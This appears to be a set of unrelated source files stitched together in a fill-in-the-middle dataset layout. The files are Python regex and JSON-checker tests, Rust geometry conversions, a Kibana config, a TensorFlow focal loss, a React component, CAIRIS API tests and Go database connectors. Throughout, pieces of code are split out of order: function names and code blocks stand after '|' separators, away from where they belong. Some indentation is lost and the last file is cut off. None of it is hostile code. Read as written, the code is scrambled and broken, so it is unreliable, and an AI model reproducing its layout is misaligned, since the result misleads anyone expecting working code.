A set of characters is defined using the metacharacters
`[` and `]`. Everything between them is part of the set, and
any single one of the set members will match.
"""
string = "sales.xlx\n" \
+ "sales1.xls\n" \
+ "orders3.xls\n" \
+ "apac1.xls\n" \
+ "sales2.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls\n" \
+ "ca1.xls"
# I want to find all files for North America(na) or South
# America(sa), but not (ca) TIP you can use the pattern .a.
# which matches in above test but in this case matches more than
# you want
change_this_search_string = '[ns]a[1-9].xls'
self.assertEquals(
len(re.findall(change_this_search_string, string)),
3)
def test_anything_but_matching(self):
"""
Lesson 2 -- Using character set ranges
Occasionally, you'll have a list of characters that you don't
want to match. Character sets can be negated using the ^
metacharacter.
"""
string = "sales.xlx\n" \
+ "sales1.xls\n" \
+ "orders3.xls\n" \
+ "apac1.xls\n" \
+ "sales2.xls\n" \
+ "sales3.xls\n" \
+ "europe2.xls\n" \
+ "sam.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls\n" \
+ "ca1.xls"
# I want to find the name 'sam'
change_this_search_string = '[^nc]am.xls'
self.assertEquals(
re.findall(change_this_search_string, string),
['sam.xls'])
| AboutRegex |
jsonchecker_unittest.py | # Copyright (C) 2010 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for jsonchecker.py."""
import unittest
from blinkpy.style.checkers import jsonchecker
class MockErrorHandler(object):
    """Callable error-handler double: forwards style errors to a
    caller-supplied callback and records whether line filtering was
    turned off."""
    def __init__(self, handle_style_error):
        # Flipped to True by turn_off_line_filtering().
        self.turned_off_filtering = False
        self._handle_style_error = handle_style_error
    def turn_off_line_filtering(self):
        self.turned_off_filtering = True
    def __call__(self, line_number, category, confidence, message):
        # Pass self along so the callback can set flags on this mock.
        self._handle_style_error(self, line_number, category, confidence, message)
        return True
class JSONCheckerTest(unittest.TestCase):
"""Tests JSONChecker class."""
def | (self):
tests = (
(0, 'No JSON object could be decoded'),
(2, 'Expecting property name: line 2 column 1 (char 2)'),
(3, 'Expecting object: line 3 column 1 (char 15)'),
(9, 'Expecting property name: line 9 column 21 (char 478)'),
)
for expected_line, message in tests:
self.assertEqual(expected_line, jsonchecker.JSONChecker.line_number_from_json_exception(ValueError(message)))
    def assert_no_error(self, json_data):
        """Run the checker over json_data and fail on any reported error."""
        def handle_style_error(mock_error_handler, line_number, category, confidence, message):
            self.fail('Unexpected error: %d %s %d %s' % (line_number, category, confidence, message))
        error_handler = MockErrorHandler(handle_style_error)
        checker = jsonchecker.JSONChecker('foo.json', error_handler)
        checker.check(json_data.split('\n'))
        # The JSON checker always disables per-line filtering.
        self.assertTrue(error_handler.turned_off_filtering)
    def assert_error(self, expected_line_number, expected_category, json_data):
        """Run the checker over json_data and require the expected error."""
        def handle_style_error(mock_error_handler, line_number, category, confidence, message):
            mock_error_handler.had_error = True
            self.assertEqual(expected_line_number, line_number)
            self.assertEqual(expected_category, category)
            self.assertIn(category, jsonchecker.JSONChecker.categories)
        error_handler = MockErrorHandler(handle_style_error)
        error_handler.had_error = False
        checker = jsonchecker.JSONChecker('foo.json', error_handler)
        checker.check(json_data.split('\n'))
        self.assertTrue(error_handler.had_error)
        self.assertTrue(error_handler.turned_off_filtering)
    def mock_handle_style_error(self):
        # No-op callback used where the error handler is irrelevant.
        pass
    def test_conflict_marker(self):
        # A VCS conflict marker is reported as a syntax error on line 0.
        self.assert_error(0, 'json/syntax', '<<<<<<< HEAD\n{\n}\n')
    def test_single_quote(self):
        # JSON requires double quotes; single quotes are a syntax error.
        self.assert_error(2, 'json/syntax', "{\n'slaves': []\n}\n")
    def test_init(self):
        # The checker stores the error handler it was constructed with.
        error_handler = MockErrorHandler(self.mock_handle_style_error)
        checker = jsonchecker.JSONChecker('foo.json', error_handler)
        self.assertEqual(checker._handle_style_error, error_handler)
def test_no_error(self):
self.assert_no_error("""{
"slaves": [ { "name": "test-slave", "platform": "*" },
{ "name": "apple-xserve-4", "platform": "mac-snowleopard" }
],
"builders": [ { "name": "SnowLeopard Intel Release (Build)", "type": "Build", "builddir": "snowleopard-intel-release",
"platform": "mac-snowleopard", "configuration": "release", "architectures": ["x86_64"],
"slavenames": ["apple-xserve-4"]
}
],
"schedulers": [ { "type": "PlatformSpecificScheduler", "platform": "mac-snowleopard", "branch": "trunk", "treeStableTimer": 45.0,
"builderNames": ["SnowLeopard Intel Release (Build)", "SnowLeopard Intel Debug (Build)"]
}
]
}
""")
| test_line_number_from_json_exception |
similarity_conversion.rs | use num::Zero;
use simba::scalar::{RealField, SubsetOf, SupersetOf};
use simba::simd::{PrimitiveSimdValue, SimdRealField, SimdValue};
use crate::base::allocator::Allocator;
use crate::base::dimension::{DimMin, DimName, DimNameAdd, DimNameSum, U1};
use crate::base::{DefaultAllocator, MatrixN, Scalar};
use crate::geometry::{
AbstractRotation, Isometry, Similarity, SuperTCategoryOf, TAffine, Transform, Translation,
};
/*
* This file provides the following conversions:
* =============================================
*
* Similarity -> Similarity
* Similarity -> Transform
* Similarity -> Matrix (homogeneous)
*/
impl<N1, N2, D: DimName, R1, R2> SubsetOf<Similarity<N2, D, R2>> for Similarity<N1, D, R1>
where
    N1: RealField + SubsetOf<N2>,
    N2: RealField + SupersetOf<N1>,
    R1: AbstractRotation<N1, D> + SubsetOf<R2>,
    R2: AbstractRotation<N2, D>,
    DefaultAllocator: Allocator<N1, D> + Allocator<N2, D>,
{
    // Widening conversion: convert the isometry and the scaling factor
    // independently.
    #[inline]
    fn to_superset(&self) -> Similarity<N2, D, R2> {
        Similarity::from_isometry(self.isometry.to_superset(), self.scaling().to_superset())
    }
    // A Similarity over the wider types is in the subset iff both its
    // isometry and its scaling are convertible to the narrower types.
    #[inline]
    fn is_in_subset(sim: &Similarity<N2, D, R2>) -> bool {
        crate::is_convertible::<_, Isometry<N1, D, R1>>(&sim.isometry)
            && crate::is_convertible::<_, N1>(&sim.scaling())
    }
    // Narrowing conversion; only valid when is_in_subset returned true.
    #[inline]
    fn from_superset_unchecked(sim: &Similarity<N2, D, R2>) -> Self {
        Similarity::from_isometry(
            sim.isometry.to_subset_unchecked(),
            sim.scaling().to_subset_unchecked(),
        )
    }
}
impl<N1, N2, D, R, C> SubsetOf<Transform<N2, D, C>> for Similarity<N1, D, R>
where
N1: RealField,
N2: RealField + SupersetOf<N1>,
C: SuperTCategoryOf<TAffine>,
R: AbstractRotation<N1, D>
+ SubsetOf<MatrixN<N1, DimNameSum<D, U1>>>
+ SubsetOf<MatrixN<N2, DimNameSum<D, U1>>>,
D: DimNameAdd<U1> + DimMin<D, Output = D>, // needed by .determinant()
DefaultAllocator: Allocator<N1, D>
+ Allocator<N1, D, D>
+ Allocator<N1, DimNameSum<D, U1>, DimNameSum<D, U1>>
+ Allocator<N2, DimNameSum<D, U1>, DimNameSum<D, U1>>
+ Allocator<(usize, usize), D>
+ Allocator<N2, DimNameSum<D, U1>, DimNameSum<D, U1>>
+ Allocator<N2, D, D>
+ Allocator<N2, D>,
{ |
#[inline]
fn is_in_subset(t: &Transform<N2, D, C>) -> bool {
<Self as SubsetOf<_>>::is_in_subset(t.matrix())
}
#[inline]
fn from_superset_unchecked(t: &Transform<N2, D, C>) -> Self {
Self::from_superset_unchecked(t.matrix())
}
}
// Similarity -> homogeneous matrix of dimension (D+1)x(D+1).
impl<N1, N2, D, R> SubsetOf<MatrixN<N2, DimNameSum<D, U1>>> for Similarity<N1, D, R>
where
    N1: RealField,
    N2: RealField + SupersetOf<N1>,
    R: AbstractRotation<N1, D>
        + SubsetOf<MatrixN<N1, DimNameSum<D, U1>>>
        + SubsetOf<MatrixN<N2, DimNameSum<D, U1>>>,
    D: DimNameAdd<U1> + DimMin<D, Output = D>, // needed by .determinant()
    DefaultAllocator: Allocator<N1, D>
        + Allocator<N1, D, D>
        + Allocator<N1, DimNameSum<D, U1>, DimNameSum<D, U1>>
        + Allocator<N2, DimNameSum<D, U1>, DimNameSum<D, U1>>
        + Allocator<(usize, usize), D>
        + Allocator<N2, DimNameSum<D, U1>, DimNameSum<D, U1>>
        + Allocator<N2, D, D>
        + Allocator<N2, D>,
{
    // Widening: go through the homogeneous-matrix form, then widen scalars.
    #[inline]
    fn to_superset(&self) -> MatrixN<N2, DimNameSum<D, U1>> {
        self.to_homogeneous().to_superset()
    }

    // A homogeneous matrix encodes a similarity iff its upper-left block is a
    // (uniformly scaled) rotation and its bottom row is (0, ..., 0, 1).
    // NOTE(review): column indices 0..2 are hard-coded, so this body is
    // written for the 3-D case even though D is generic — confirm upstream.
    #[inline]
    fn is_in_subset(m: &MatrixN<N2, DimNameSum<D, U1>>) -> bool {
        let mut rot = m.fixed_slice::<D, D>(0, 0).clone_owned();

        // Normalize the first three columns; failure means a zero column,
        // which cannot come from a similarity.
        if rot
            .fixed_columns_mut::<U1>(0)
            .try_normalize_mut(N2::zero())
            .is_some()
            && rot
                .fixed_columns_mut::<U1>(1)
                .try_normalize_mut(N2::zero())
                .is_some()
            && rot
                .fixed_columns_mut::<U1>(2)
                .try_normalize_mut(N2::zero())
                .is_some()
        {
            // FIXME: could we avoid explicit the computation of the determinant?
            // (its sign is needed to see if the scaling factor is negative).
            if rot.determinant() < N2::zero() {
                rot.fixed_columns_mut::<U1>(0).neg_mut();
                rot.fixed_columns_mut::<U1>(1).neg_mut();
                rot.fixed_columns_mut::<U1>(2).neg_mut();
            }

            let bottom = m.fixed_slice::<U1, D>(D::dim(), 0);
            // Scalar types agree.
            m.iter().all(|e| SupersetOf::<N1>::is_in_subset(e)) &&
            // The normalized block part is a rotation.
            // rot.is_special_orthogonal(N2::default_epsilon().sqrt()) &&
            // The bottom row is (0, 0, ..., 1)
            bottom.iter().all(|e| e.is_zero()) && m[(D::dim(), D::dim())] == N2::one()
        } else {
            false
        }
    }

    // Narrowing: recover scale as the mean of the three column norms (for
    // robustness), flip signs when the rotation block has negative
    // determinant, and split off the translation column.
    #[inline]
    fn from_superset_unchecked(m: &MatrixN<N2, DimNameSum<D, U1>>) -> Self {
        let mut mm = m.clone_owned();
        let na = mm.fixed_slice_mut::<D, U1>(0, 0).normalize_mut();
        let nb = mm.fixed_slice_mut::<D, U1>(0, 1).normalize_mut();
        let nc = mm.fixed_slice_mut::<D, U1>(0, 2).normalize_mut();

        let mut scale = (na + nb + nc) / crate::convert(3.0); // We take the mean, for robustness.

        // FIXME: could we avoid the explicit computation of the determinant?
        // (its sign is needed to see if the scaling factor is negative).
        if mm.fixed_slice::<D, D>(0, 0).determinant() < N2::zero() {
            mm.fixed_slice_mut::<D, U1>(0, 0).neg_mut();
            mm.fixed_slice_mut::<D, U1>(0, 1).neg_mut();
            mm.fixed_slice_mut::<D, U1>(0, 2).neg_mut();
            scale = -scale;
        }

        // Last column (above the bottom row) is the translation part.
        let t = m.fixed_slice::<D, U1>(0, D::dim()).into_owned();
        let t = Translation {
            vector: crate::convert_unchecked(t),
        };

        Self::from_parts(
            t,
            crate::convert_unchecked(mm),
            crate::convert_unchecked(scale),
        )
    }
}
// Convenience conversion: a similarity is losslessly representable as its
// homogeneous (D+1)x(D+1) matrix.
impl<N: SimdRealField, D: DimName, R> From<Similarity<N, D, R>> for MatrixN<N, DimNameSum<D, U1>>
where
    D: DimNameAdd<U1>,
    R: SubsetOf<MatrixN<N, DimNameSum<D, U1>>>,
    DefaultAllocator: Allocator<N, D> + Allocator<N, DimNameSum<D, U1>, DimNameSum<D, U1>>,
{
    #[inline]
    fn from(sim: Similarity<N, D, R>) -> Self {
        sim.to_homogeneous()
    }
}
// Pack two scalar-lane similarities into one 2-lane SIMD similarity: the
// isometries are combined lane-wise and the scaling factors are packed into
// the SIMD scalar.
impl<N: Scalar + Zero + PrimitiveSimdValue, D: DimName, R>
    From<[Similarity<N::Element, D, R::Element>; 2]> for Similarity<N, D, R>
where
    N: From<[<N as SimdValue>::Element; 2]>,
    R: SimdValue + AbstractRotation<N, D> + From<[<R as SimdValue>::Element; 2]>,
    R::Element: AbstractRotation<N::Element, D>,
    N::Element: Scalar + Zero + Copy,
    R::Element: Scalar + Zero + Copy,
    DefaultAllocator: Allocator<N, D> + Allocator<N::Element, D>,
{
    #[inline]
    fn from(arr: [Similarity<N::Element, D, R::Element>; 2]) -> Self {
        let iso = Isometry::from([arr[0].isometry.clone(), arr[1].isometry.clone()]);
        let scale = N::from([arr[0].scaling(), arr[1].scaling()]);

        Self::from_isometry(iso, scale)
    }
}
// Same lane-wise packing as the 2-lane impl above, for 4 SIMD lanes.
impl<N: Scalar + Zero + PrimitiveSimdValue, D: DimName, R>
    From<[Similarity<N::Element, D, R::Element>; 4]> for Similarity<N, D, R>
where
    N: From<[<N as SimdValue>::Element; 4]>,
    R: SimdValue + AbstractRotation<N, D> + From<[<R as SimdValue>::Element; 4]>,
    R::Element: AbstractRotation<N::Element, D>,
    N::Element: Scalar + Zero + Copy,
    R::Element: Scalar + Zero + Copy,
    DefaultAllocator: Allocator<N, D> + Allocator<N::Element, D>,
{
    #[inline]
    fn from(arr: [Similarity<N::Element, D, R::Element>; 4]) -> Self {
        let iso = Isometry::from([
            arr[0].isometry.clone(),
            arr[1].isometry.clone(),
            arr[2].isometry.clone(),
            arr[3].isometry.clone(),
        ]);
        let scale = N::from([
            arr[0].scaling(),
            arr[1].scaling(),
            arr[2].scaling(),
            arr[3].scaling(),
        ]);

        Self::from_isometry(iso, scale)
    }
}
// Same lane-wise packing as the 2-lane impl above, for 8 SIMD lanes.
impl<N: Scalar + Zero + PrimitiveSimdValue, D: DimName, R>
    From<[Similarity<N::Element, D, R::Element>; 8]> for Similarity<N, D, R>
where
    N: From<[<N as SimdValue>::Element; 8]>,
    R: SimdValue + AbstractRotation<N, D> + From<[<R as SimdValue>::Element; 8]>,
    R::Element: AbstractRotation<N::Element, D>,
    N::Element: Scalar + Zero + Copy,
    R::Element: Scalar + Zero + Copy,
    DefaultAllocator: Allocator<N, D> + Allocator<N::Element, D>,
{
    #[inline]
    fn from(arr: [Similarity<N::Element, D, R::Element>; 8]) -> Self {
        let iso = Isometry::from([
            arr[0].isometry.clone(),
            arr[1].isometry.clone(),
            arr[2].isometry.clone(),
            arr[3].isometry.clone(),
            arr[4].isometry.clone(),
            arr[5].isometry.clone(),
            arr[6].isometry.clone(),
            arr[7].isometry.clone(),
        ]);
        let scale = N::from([
            arr[0].scaling(),
            arr[1].scaling(),
            arr[2].scaling(),
            arr[3].scaling(),
            arr[4].scaling(),
            arr[5].scaling(),
            arr[6].scaling(),
            arr[7].scaling(),
        ]);

        Self::from_isometry(iso, scale)
    }
}
// Same lane-wise packing as the 2-lane impl above, for 16 SIMD lanes.
impl<N: Scalar + Zero + PrimitiveSimdValue, D: DimName, R>
    From<[Similarity<N::Element, D, R::Element>; 16]> for Similarity<N, D, R>
where
    N: From<[<N as SimdValue>::Element; 16]>,
    R: SimdValue + AbstractRotation<N, D> + From<[<R as SimdValue>::Element; 16]>,
    R::Element: AbstractRotation<N::Element, D>,
    N::Element: Scalar + Zero + Copy,
    R::Element: Scalar + Zero + Copy,
    DefaultAllocator: Allocator<N, D> + Allocator<N::Element, D>,
{
    #[inline]
    fn from(arr: [Similarity<N::Element, D, R::Element>; 16]) -> Self {
        let iso = Isometry::from([
            arr[0].isometry.clone(),
            arr[1].isometry.clone(),
            arr[2].isometry.clone(),
            arr[3].isometry.clone(),
            arr[4].isometry.clone(),
            arr[5].isometry.clone(),
            arr[6].isometry.clone(),
            arr[7].isometry.clone(),
            arr[8].isometry.clone(),
            arr[9].isometry.clone(),
            arr[10].isometry.clone(),
            arr[11].isometry.clone(),
            arr[12].isometry.clone(),
            arr[13].isometry.clone(),
            arr[14].isometry.clone(),
            arr[15].isometry.clone(),
        ]);
        let scale = N::from([
            arr[0].scaling(),
            arr[1].scaling(),
            arr[2].scaling(),
            arr[3].scaling(),
            arr[4].scaling(),
            arr[5].scaling(),
            arr[6].scaling(),
            arr[7].scaling(),
            arr[8].scaling(),
            arr[9].scaling(),
            arr[10].scaling(),
            arr[11].scaling(),
            arr[12].scaling(),
            arr[13].scaling(),
            arr[14].scaling(),
            arr[15].scaling(),
        ]);

        Self::from_isometry(iso, scale)
    }
} | #[inline]
fn to_superset(&self) -> Transform<N2, D, C> {
Transform::from_matrix_unchecked(self.to_homogeneous().to_superset())
} |
config.ts | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License;
* you may not use this file except in compliance with the Elastic License. | // tslint:disable:no-default-export
export default createTestConfig('security_only', { disabledPlugins: ['spaces'], license: 'trial' }); | */
import { createTestConfig } from '../common/config';
|
focal_loss.py | """
AI Challenger观点型问题阅读理解
focal_loss.py
@author: yuhaitao
"""
# -*- coding:utf-8 -*-
import tensorflow as tf
def sparse_focal_loss( | amma=2):
"""
Computer focal loss for multi classification
Args:
labels: A int32 tensor of shape [batch_size].
logits: A float32 tensor of shape [batch_size,num_classes].
gamma: A scalar for focal loss gamma hyper-parameter.
Returns:
A tensor of the same shape as `lables`
"""
with tf.name_scope("focal_loss"):
y_pred = tf.nn.softmax(logits, dim=-1) # [batch_size,num_classes]
labels = tf.one_hot(labels, depth=y_pred.shape[1])
L = -labels * ((1 - y_pred)**gamma) * tf.log(y_pred)
L = tf.reduce_sum(L, axis=1)
return L
'''
if __name__ == '__main__':
labels = tf.constant([0, 1], name="labels")
logits = tf.constant([[0.7, 0.2, 0.1], [0.6, 0.1, 0.3]], name="logits")
a = tf.reduce_mean(sparse_focal_loss(logits, tf.stop_gradient(labels)))
with tf.Session() as sess:
print(sess.run(a))'''
| logits, labels, g |
index.js | import React, { Component } from 'react'
import PropTypes from 'prop-types'
// Renders an array of plain-object element descriptors as a React tree.
// Each descriptor may carry: type, className, style, href, src, data
// (text content) and children (nested descriptors).
export default class JSON2React extends Component {
  static propTypes = {
    elements: PropTypes.array
  }

  // Recursively converts descriptors into React elements. `data` wins over
  // `children` when both are present; the key combines type and index.
  // NOTE(review): keys built from type+index are unstable under reordering —
  // acceptable for static trees only.
  renderElements=(elements) => {
    return elements.map((element, ix) =>
      React.createElement(
        element.type,
        { className: element.className, style: element.style, href: element.href, src: element.src, key: element.type + '-' + ix }, element.data || (element.children && element.children.length > 0 && this.renderElements(element.children))
      )
    )
  }

  render() {
    const {
      elements
    } = this.props
    return (
      <div>
        {this.renderElements(elements)}
      </div>
    )
} | } |
|
test_GoalAPI.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
from urllib import quote
import jsonpickle
from cairis.core.Goal import Goal
from cairis.core.GoalEnvironmentProperties import GoalEnvironmentProperties
from cairis.test.CairisDaemonTestCase import CairisDaemonTestCase
import os
from cairis.mio.ModelImport import importModelFile
__author__ = 'Robin Quetin, Shamal Faily'
class GoalAPITests(CairisDaemonTestCase):
  @classmethod
  def setUpClass(cls):
    # Import the NeuroGrid exemplar model once for the whole class so every
    # test runs against a known database state.
    importModelFile(os.environ['CAIRIS_SRC'] + '/../examples/exemplars/NeuroGrid/NeuroGrid.xml',1,'test')
  def setUp(self):
    """Per-test fixtures: names that exist in the imported NeuroGrid model."""
    # region Class fields
    self.logger = logging.getLogger(__name__)
    self.existing_goal_name = 'Multi-Factor Authentication'
    self.existing_category = 'Maintain'
    self.existing_environment_name_1 = 'Stroke'
    self.existing_environment_name_2 = 'Psychosis'
    # Fully-qualified class path used by jsonpickle payloads.
    self.goal_class = Goal.__module__+'.'+Goal.__name__
    self.to_delete_ids = []
    # endregion
  def test_get_all(self):
    """GET /api/goals returns a non-empty dictionary of goals."""
    method = 'test_get_all'
    rv = self.app.get('/api/goals?session_id=test')
    goals = jsonpickle.decode(rv.data)
    self.assertIsNotNone(goals, 'No results after deserialization')
    self.assertIsInstance(goals, dict, 'The result is not a dictionary as expected')
    self.assertGreater(len(goals), 0, 'No goals in the dictionary')
    self.logger.info('[%s] Goals found: %d', method, len(goals))
    goal = goals.values()[0]
    self.logger.info('[%s] First goal: %s [%d]\n', method, goal['theName'], goal['theId'])
  def test_get_by_name(self):
    """GET /api/goals/name/<name> returns the known goal by its name."""
    method = 'test_get_by_name'
    url = '/api/goals/name/%s?session_id=test' % quote(self.existing_goal_name)
    rv = self.app.get(url)
    self.assertIsNotNone(rv.data, 'No response')
    self.logger.debug('[%s] Response data: %s', method, rv.data)
    goal = jsonpickle.decode(rv.data)
    self.assertIsNotNone(goal, 'No results after deserialization')
    self.logger.info('[%s] Goal: %s [%d]\n', method, goal['theName'], goal['theId'])
  def test_delete(self):
    """DELETE removes a goal previously created via POST and reports success."""
    method = 'test_delete'
    url = '/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName)
    new_goal_body = self.prepare_json()

    # Delete first to guarantee a clean slate, then create the goal to delete.
    self.app.delete(url)
    self.logger.info('[%s] Object to delete: %s', method, new_goal_body)
    self.app.post('/api/goals', content_type='application/json', data=new_goal_body)
    self.logger.info('[%s] URL: %s', method, url)
    rv = self.app.delete(url)
    self.logger.info('[%s] Response data: %s', method, rv.data)
    self.assertIsNotNone(rv.data, 'No response')
    json_resp = jsonpickle.decode(rv.data)
    self.assertIsInstance(json_resp, dict, 'The response cannot be converted to a dictionary')
    message = json_resp.get('message', None)
    self.assertIsNotNone(message, 'No message in response')
    self.logger.info('[%s] Message: %s\n', method, message)
  def test_post(self):
    """POST /api/goals creates a goal and returns a positive goal_id."""
    method = 'test_post'
    url = '/api/goals'
    self.logger.info('[%s] URL: %s', method, url)
    new_goal_body = self.prepare_json()

    # Remove any leftover goal with the same name before creating it.
    self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
    rv = self.app.post(url, content_type='application/json', data=new_goal_body)
    self.logger.debug('[%s] Response data: %s', method, rv.data)
    json_resp = jsonpickle.decode(rv.data)
    self.assertIsNotNone(json_resp, 'No results after deserialization')
    env_id = json_resp.get('goal_id', None)
    self.assertIsNotNone(env_id, 'No goal ID returned')
    self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
    self.logger.info('[%s] Goal ID: %d\n', method, env_id)

    # Clean up the created goal.
    rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
  def test_put(self):
    """PUT updates a freshly created goal and the change is readable back."""
    method = 'test_put'
    url = '/api/goals'
    self.logger.info('[%s] URL: %s', method, url)
    new_goal_body = self.prepare_json()

    # Clean slate, then create the goal we are going to update.
    rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
    rv = self.app.post(url, content_type='application/json', data=new_goal_body)
    self.logger.debug('[%s] Response data: %s', method, rv.data)
    json_resp = jsonpickle.decode(rv.data)
    self.assertIsNotNone(json_resp, 'No results after deserialization')
    env_id = json_resp.get('goal_id', None)
    self.assertIsNotNone(env_id, 'No goal ID returned')
    self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
    self.logger.info('[%s] Goal ID: %d', method, env_id)

    # Rename the goal through PUT, addressing it by its old name.
    goal_to_update = self.prepare_new_goal()
    goal_to_update.theName = 'Edited test goal'
    goal_to_update.theId = env_id
    upd_env_body = self.prepare_json(goal=goal_to_update)
    rv = self.app.put('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName), data=upd_env_body, content_type='application/json')
    self.assertIsNotNone(rv.data, 'No response')
    json_resp = jsonpickle.decode(rv.data)
    self.assertIsNotNone(json_resp)
    self.assertIsInstance(json_resp, dict)
    message = json_resp.get('message', None)
    self.assertIsNotNone(message, 'No message in response')
    self.logger.info('[%s] Message: %s', method, message)
    self.assertGreater(message.find('successfully updated'), -1, 'The goal was not successfully updated')

    # The updated goal must be retrievable under its new name.
    rv = self.app.get('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
    upd_goal = jsonpickle.decode(rv.data)
    self.assertIsNotNone(upd_goal, 'Unable to decode JSON data')
    self.logger.debug('[%s] Response data: %s', method, rv.data)
    self.logger.info('[%s] Goal: %s [%d]\n', method, upd_goal['theName'], upd_goal['theId'])

    # Clean up.
    rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
  def prepare_new_goal(self):
    """Build an unsaved Goal fixture named 'Test goal' with environment
    properties for both known environments.

    The two dictionary attributes are deleted before returning so jsonpickle
    does not serialize derived state the API does not accept.
    """
    new_goal_refinements = [
      [
        "PreventUnauthorised Certificate Access",
        "goal",
        "or",
        "No",
        "None"
      ]
    ]
    new_subgoal_refinements = [
      [
        "PreventUnauthorised Certificate Access",
        "goal",
        "or",
        "No",
        "None"
      ]
    ]
    new_goal_props = [
      GoalEnvironmentProperties(
        environmentName=self.existing_environment_name_1,
        lbl='Test 1',
        definition='This is a first test property',
        category=self.existing_category,
        priority='Medium',
        fitCriterion='None',
        issue='None',
        goalRefinements=new_goal_refinements,
        subGoalRefinements=new_subgoal_refinements,
        concs=[],cas=[]
      ),
      GoalEnvironmentProperties(
        environmentName=self.existing_environment_name_2,
        lbl='Test 2',
        definition='This is a second test property',
        category=self.existing_category,
        priority='Low',
        fitCriterion='None',
        issue='Test issue',
        goalRefinements=new_goal_refinements,
        subGoalRefinements=new_subgoal_refinements,
        concs=[],cas=[]
      )
    ]
    new_goal = Goal(
      goalId=-1,
      goalName='Test goal',
      goalOrig='',
      tags=['test', 'test123'],
      environmentProperties=[]
    )
    new_goal.theEnvironmentProperties = new_goal_props
    # Strip derived dictionaries so they are not serialized with the goal.
    new_goal.theEnvironmentDictionary = {}
    new_goal.theGoalPropertyDictionary = {}
    delattr(new_goal, 'theEnvironmentDictionary')
    delattr(new_goal, 'theGoalPropertyDictionary')
    return new_goal
def prepare_dict(self, goal=None):
if goal is None:
goal = self.prepare_new_goal()
else:
assert isinstance(goal, Goal)
return {
'session_id': 'test',
'object': goal,
}
def | (self, data_dict=None, goal=None):
if data_dict is None:
data_dict = self.prepare_dict(goal=goal)
else:
assert isinstance(data_dict, dict)
new_goal_body = jsonpickle.encode(data_dict, unpicklable=False)
self.logger.info('JSON data: %s', new_goal_body)
return new_goal_body
| prepare_json |
version.go | package data
import (
"context"
"fmt"
"net/http"
"sort"
"github.com/evergreen-ci/evergreen"
"github.com/evergreen-ci/evergreen/model"
"github.com/evergreen-ci/evergreen/model/build"
"github.com/evergreen-ci/evergreen/model/task"
"github.com/evergreen-ci/evergreen/repotracker"
restModel "github.com/evergreen-ci/evergreen/rest/model"
"github.com/evergreen-ci/gimlet"
"github.com/mongodb/grip"
"github.com/pkg/errors"
)
// DBVersionConnector is a struct that implements Version related methods
// from the Connector through interactions with the backing database.
type DBVersionConnector struct{}
// FindCostByVersionId queries the backing database for cost data associated
// with the given versionId. This is done by aggregating TimeTaken over all
// tasks of the given model.Version.
func (vc *DBVersionConnector) FindCostByVersionId(versionId string) (*task.VersionCost, error) {
	var results []task.VersionCost
	if err := task.Aggregate(task.CostDataByVersionIdPipeline(versionId), &results); err != nil {
		return nil, err
	}
	switch len(results) {
	case 0:
		// No matching version: report 404 to the caller.
		return nil, gimlet.ErrorResponse{
			StatusCode: http.StatusNotFound,
			Message:    fmt.Sprintf("version with id %s not found", versionId),
		}
	case 1:
		return &results[0], nil
	default:
		// The aggregation is keyed by version ID, so anything but a single
		// document indicates a malformed pipeline result.
		return nil, fmt.Errorf("aggregation query with version_id %s returned %d results but should only return 1 result", versionId, len(results))
	}
}
// FindVersionById queries the backing database for the version with the
// given versionId, returning a 404-style error when it does not exist.
func (vc *DBVersionConnector) FindVersionById(versionId string) (*model.Version, error) {
	version, err := model.VersionFindOne(model.VersionById(versionId))
	switch {
	case err != nil:
		return nil, err
	case version == nil:
		return nil, gimlet.ErrorResponse{
			StatusCode: http.StatusNotFound,
			Message:    fmt.Sprintf("version with id %s not found", versionId),
		}
	default:
		return version, nil
	}
}
// FindVersionByProjectAndRevision looks up the base version for the given
// project ID and revision via the model package's query helper.
